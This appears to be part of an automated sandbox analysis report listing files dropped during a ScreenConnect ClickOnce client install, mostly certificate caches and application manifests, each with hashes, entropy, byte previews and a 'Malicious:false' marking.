                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13340
                                                                                                                                                                                                                                                      Entropy (8bit):2.684279421165718
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:TiZYWeruQ64NYZYlWzHoYEZHFt8inL8tdw0k0aeslMYQnIbQ3:2ZDAOW29aeslMYQIbQ3
                                                                                                                                                                                                                                                      MD5:B9B707B003C05D88798857998174BD18
                                                                                                                                                                                                                                                      SHA1:8F4C331FF9C5D0A1F79BE1D3C375F8B6FB432D90
                                                                                                                                                                                                                                                      SHA-256:C05152978E100E9161FB0DB9C4FAEF82E915F2A6A7D9D89BDB519FF2717BF792
                                                                                                                                                                                                                                                      SHA-512:D186563E5360C52879C8FE0145E825F5C59018153AC34CFFEA6C07D3CA33AC9D45092698155743BDD2398A42982C3E8CE04C5DD0411408B11683FD7E47FCEADD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4770
                                                                                                                                                                                                                                                      Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                      MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                      SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                      SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                      SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                      MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                      SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                      SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                      SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):727
                                                                                                                                                                                                                                                      Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                      MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                      SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                      SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                      SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241023184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241023184215Z....20241030184215Z0...*.H.............$...Q...}oW..X.].2......2d....mOE.x.. sB1p..4..z,A.D7...[...E..JPH.M.&....).q.........V.h.c.............:......T{.....q.`..Z.u.(..b.K..=.ev..F.....inf.T.6$.R.L3E.....Aq.......4'<....S.F|[}}#T.....N.N6.6#Wmu.j..m.d....G...S.{).Pk.....e..{iFO..Q>.&..lG`...,.b.?..Kh4b..q...@'.H.:.{...L.X.ZT...2.gf.!?:...G...*.Z}.$p.f.....}.N.. ...2T...M....8..3..NJj...Z.h.............[..Z.q.<.G(F..j.....'..&.....:..(.Y..s...5A..7....!....4.N..,..O..oU2..5..g...CX.....SZ..A..@=u.0B.gJ......L;..(.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1428
                                                                                                                                                                                                                                                      Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                      MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                      SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                      SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                      SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.267890441105352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKCRl7sN+SkQlPlEGYRMY9z+s3Ql2DUevat:6RFTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:D1C659FB35BF7CE2FA88AD06001D3925
                                                                                                                                                                                                                                                      SHA1:CE36775A6CE264F8E49C369DB0FD7494B96F9EDC
                                                                                                                                                                                                                                                      SHA-256:C121E396FEA6A125C93C92C3F9395E2A2F345CBC0CAB48BF1177A1EEB57D7E7C
                                                                                                                                                                                                                                                      SHA-512:802D8276AAECA2FFCDAE976BD6E95879703B88F21EFF64105144CB7E4684E5C3B552DB8F609EA19B4BA86038C2387156C159B5ACC427E0B9A8A775DDD6BC5A6D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ........z.B..(..(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                      Entropy (8bit):3.130277681168393
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKsPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:UPiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                      MD5:C7E06CE842ADBFE300BC17D997AF7C7B
                                                                                                                                                                                                                                                      SHA1:7DD46627A2DB6C6452EAAFA4C70847DBB1A55E51
                                                                                                                                                                                                                                                      SHA-256:48D3AA68699E7B9281CB51D9C32638D5B8E3AE58AEF2F5E412FF9E4210541F1F
                                                                                                                                                                                                                                                      SHA-512:FD41726FFA52C77F37D08652982A32A07DBE0DC544FE18A2E24419699A21B28C2E4FA7B8EE40E2FFBFDFAC431F7FF8C365C528941899034BC744E967E210138C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ..........&.a'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                                                                                      Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKQ/fzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:4/qtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                      MD5:0845761F3BA87265871F0A1FB9E3610F
                                                                                                                                                                                                                                                      SHA1:03A7084782AFD787CA03981B2599C7501E4402F4
                                                                                                                                                                                                                                                      SHA-256:509CADE7E38F50895F1E617B1C3F22BB06A6C84AEABF73044DC640847CBC4FE2
                                                                                                                                                                                                                                                      SHA-512:22ECA749990099EAAE950B8BC1F6634DEE916BA14F3D29A5ED090720066B833A80C2A888495548136ECD1647F89791131EA0E8BBCC961A006AF6CE15A705B6DC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... .........5.Nv'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                      Entropy (8bit):3.995557848806517
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKEZ/betlIls4qfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:y/RqmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                      MD5:5C6EEF5F1C4F6E114C391EFAA8ABC72A
                                                                                                                                                                                                                                                      SHA1:E926DF3696EA9455026BD64795126E6BC47DC1AA
                                                                                                                                                                                                                                                      SHA-256:87C6CA3EC88F8AB221A6A596E706391D183243902E762BA3A9254F1B49857E14
                                                                                                                                                                                                                                                      SHA-512:615D72FD6E7EDEC84815AC549E5C51F43F52F54A8686522C632A967C6A84A5A9D283BB264A23B9192718010356157C30D4D8C3F06CC8E07D32ABE8FD434BAA13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....(.......n'..(................].G{%....}p.*....................}p.*.. .........G..&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                                                                                      Entropy (8bit):3.042052853183184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKaL/hLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:iDhLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                      MD5:8468F07A4EE859D5C594D6F1014A4EF3
                                                                                                                                                                                                                                                      SHA1:E3EF7163966AA965B788A0714452AA2E6507E1FD
                                                                                                                                                                                                                                                      SHA-256:5333171D0B1E2EDAD4C19CB8F0F59DACEBAA241AC31924A2B31F8A354DCD3199
                                                                                                                                                                                                                                                      SHA-512:BFAC745A990060B0F24737152F78571B1191550F91A2959EC2268570E459FA46C03E4A3C02336A5013F0163C61967157FF54E9FAEDA85C0E75323917427558F3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....l...R..aN'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25496
                                                                                                                                                                                                                                                      Entropy (8bit):5.589617222565984
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:2rq6CGch6wX91yYFX9R/QPIBM7Yh9LyKfbSu6xJbflm:2WVh6wX9PX9R/QPI+0hJfm9/hm
                                                                                                                                                                                                                                                      MD5:18170459129F7777CA8B5A9D2C5CF5D8
                                                                                                                                                                                                                                                      SHA1:70E64B4A6AB602AD0ACC87F7CC19F1BDE06037B0
                                                                                                                                                                                                                                                      SHA-256:63336184535BB30A5EED15F142C1C72B001C20F1FDD0F3ACD4E64274D18ED6BC
                                                                                                                                                                                                                                                      SHA-512:93E77B9B61C40BF30F073E0673CA6A90444DB84776C8C8E232D5A72FF5060837E64941D12C5948CD07B9F6823486382F03FD1974BFA05E94F85BFBE86A427CDD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH............USLf.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........U............S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...P...S...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3452
                                                                                                                                                                                                                                                      Entropy (8bit):4.236954777604761
                                                                                                                                                                                                                                                      Encrypted:false
